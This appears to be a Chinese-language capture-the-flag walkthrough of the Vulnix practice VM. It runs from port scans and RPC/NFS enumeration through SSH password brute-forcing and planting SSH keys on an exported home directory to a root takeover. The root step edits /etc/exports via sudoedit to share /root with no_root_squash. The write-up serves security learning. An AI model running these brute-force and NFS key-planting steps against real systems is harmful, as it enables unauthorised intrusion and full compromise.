Vulnx

靶机IP 192.168.1.135
kaliIP 192.168.1.128
信息收集

sudo nmap --min-rate 10000 -p- 192.168.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 10:13 CST
Nmap scan report for bogon (192.168.1.135)
Host is up (0.0018s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
79/tcp    open  finger
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
35745/tcp open  unknown
44010/tcp open  unknown
50309/tcp open  unknown
55641/tcp open  unknown
59567/tcp open  unknown
sudo nmap -sT -sV -O -p- 192.168.1.135      

Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
79/tcp    open  finger     Linux fingerd
110/tcp   open  pop3?
111/tcp   open  rpcbind    2-4 (RPC #100000)
143/tcp   open  imap       Dovecot imapd
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell?
993/tcp   open  ssl/imap   Dovecot imapd
995/tcp   open  ssl/pop3s?
2049/tcp  open  nfs        2-4 (RPC #100003)
35745/tcp open  mountd     1-3 (RPC #100005)
44010/tcp open  nlockmgr   1-4 (RPC #100021)
50309/tcp open  mountd     1-3 (RPC #100005)
55641/tcp open  mountd     1-3 (RPC #100005)
59567/tcp open  status     1 (RPC #100024)
MAC Address: 00:0C:29:5E:A3:8D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
关注点:


smtp服务(25)
简单邮件远程传输服务,可能需要pop3(110)和imap服务(143),可能存在弱口令爆破。
finger服务(79)
用于查询主机或者用户的信息
rpcbind服务(111)
远程过程调用,简单的理解是一个节点请求另一个节点提供的服务,可以进行枚举
rsh服务
linux远程连接,需要密码,可能存在爆破

rpcinfo -p 192.168.1.135
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  53781  status
    100024    1   tcp  59567  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049  nfs_acl
    100227    3   tcp   2049  nfs_acl
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049  nfs_acl
    100227    3   udp   2049  nfs_acl
    100021    1   udp  42327  nlockmgr
    100021    3   udp  42327  nlockmgr
    100021    4   udp  42327  nlockmgr
    100021    1   tcp  44010  nlockmgr
    100021    3   tcp  44010  nlockmgr
    100021    4   tcp  44010  nlockmgr
    100005    1   udp  38329  mountd
    100005    1   tcp  35745  mountd
    100005    2   udp  42275  mountd
    100005    2   tcp  55641  mountd
    100005    3   udp  45218  mountd
    100005    3   tcp  50309  mountd

nfs侦听2049端口的tcp服务和udp服务

showmount -e 192.168.1.135
Export list for 192.168.1.135:
/home/vulnix *

意味着可以从任何主机访问共享。因此将该共享的位置安装在本地计算机上
打开提示权限不够,应该是设置了root_squash
no_root_squash:登入 NFS 主机使用分享目录的使用者,如果是 root 的话,那么对于这个分享的目录来说,他就具有 root 的权限!这个项目『极不安全』,不建议使用!
root_squash:在登入 NFS 主机使用分享之目录的使用者如果是 root 时,那么这个使用者的权限将被压缩成为匿名使用者,通常他的 UID 与 GID 都会变成 nobody 那个系统账号的身份。
枚举smtp用户,发现root,user和vulnix账号,通过hydra只能爆破出user的密码,

ACCOUNT FOUND: [ssh] Host: 192.168.1.135 User: user Password: letmein [SUCCESS]
user:letmein
user@vulnix:~$ ls
user@vulnix:~$ whoami
user
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux

没有利用的数据,无思路。
看了一下WP,思路为:

  1. 将靶机的/home/vulnix目录通过nfs服务挂载到本地/tmp/vulnix中
  2. 切换到kali的vulnix用户
  3. 将当前用户的ssh公钥复制到/tmp目录
  4. 将ssh公钥复制到远程目录中的authorized_keys文件
  5. 通过ssh免密登录靶机的vulnix用户
  6. 之后在进行提权操作

在Linux系统中,每个用户都有一个唯一的用户ID(uid)。ssh登录时,服务器端会校验连接用户的uid和authorized_keys文件所属的uid是否一致。如果不一致的话,ssh登录会失败。所以kali中vulnix用户UID必须和靶机相同。
查看vulnix用户的uid

user@vulnix:~$ cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash

kali新建用户vulnix,设置密码,UID。

useradd -m vulnix   
                                                                                                                                                       
passwd vulnix 
  
新的密码: 
重新输入新的密码: 
passwd:已成功更新密码

leafpad /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/bash

注: -m 生成用户的目录
挂载
mount -t nfs 192.168.1.135:/home/vulnix /tmp/mount/
切换
su vulnix
$ bash
建立公私钥对

ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): 
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2oDhnxJHWud5qTfFGW6m6w8pPEHo218RGPpYtkygZGs vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
|      o . .      |
|     o + o o     |
|    . E + = o    |
|   . O + O = +   |
|    = + S * O    |
|     + O + * .   |
|    . = B * .    |
|     .   = =     |
|         .+..    |
+----[SHA256]-----+

注:id_rsa私钥 id_rsa.pub公钥,需要将公钥放到在本地挂载的目录下
cp ~/.ssh/id_rsa.pub /tmp/mount/.ssh/authorized_keys
或者
cat ~/.ssh/id_rsa.pub >/tmp/mount/.ssh/authorized_keys
ssh连接
ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa vulnix@192.168.1.135 -v
注:
-i 指定私钥文件;
另 目前最新的Linux的ssh不支持ssh-dss(据说是不安全,所以不建议再ssh.configer中修改),所以临时加上参数 -o
注意密钥文件(~/.ssh/id_rsa 和 /tmp/mount/.ssh/authorized_keys )的权限.(我改为777一直上不去,卡了一天 ╮(~ ̄▽ ̄)╭ )
https://blog.csdn.net/u010694718/article/details/104804066#::text=%E9%A6%96%E5%85%88%E8%AE%BE%E7%BD%AE%2F.ssh%E7%9B%AE%E5%BD%95%E6%9D%83%E9%99%90%E4%B8%BA700%EF%BC%8C%E7%84%B6%E5%90%8E%E8%AE%BE%E7%BD%AEauthorized_keys%E6%9D%83%E9%99%90%E4%B8%BA600%E3%80%82%20cd%20%20chmod%20700%20%2F.ssh,cd%20~%2F.ssh%20chmod%20600%20authorized_keys%201

vlnix@vulnix:~$ whoami
vulnix

切换成功,开始提权。

vulnix@vulnix:/$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit
    /etc/exports

打开 /etc/exports添加 /root *(rw,no_root_squash) 将靶机的root目录通过nfs共享出来

vulnix@vulnix:/etc$ sudoedit /etc/exports 
sudoedit: /etc/exports unchanged

重启靶机 读取nfs配置文件
kali新建/tmp/v,将靶机root目录挂载到/tmp/v
mount -t nfs 192.168.1.135:/root /tmp/v
重新生成公私钥对,将公钥赋给靶机后通过ssh连接。

┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:84l0+6YMhIOFm2J9Bm46edZUOd0At8Caug1dx6YwaAs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .o.o      |
|     .  .= +     |
|    o..o+.o .    |
|  Eoo*=o..+      |
|  ooB+*+S+.      |
| . =+=.+.= o     |
|  + o+. o +      |
|   +. .  o ..    |
|          oo.    |
+----[SHA256]-----+
┌──(root㉿kali)-[~/.ssh]
└─# cp ~/.ssh/id_rsa.pub /tmp/v/.ssh/authorized_keys 
┌──(root㉿kali)-[/tmp/v/.ssh]
└─# ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa root@192.168.1.135 -v
root@vulnix:~# whoami
root
root@vulnix:~# uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

提权成功

热门相关:我有一座恐怖屋   名门盛婚:首席,别来无恙!   上将大叔,狼来了!   楚氏赘婿   嫡嫁千金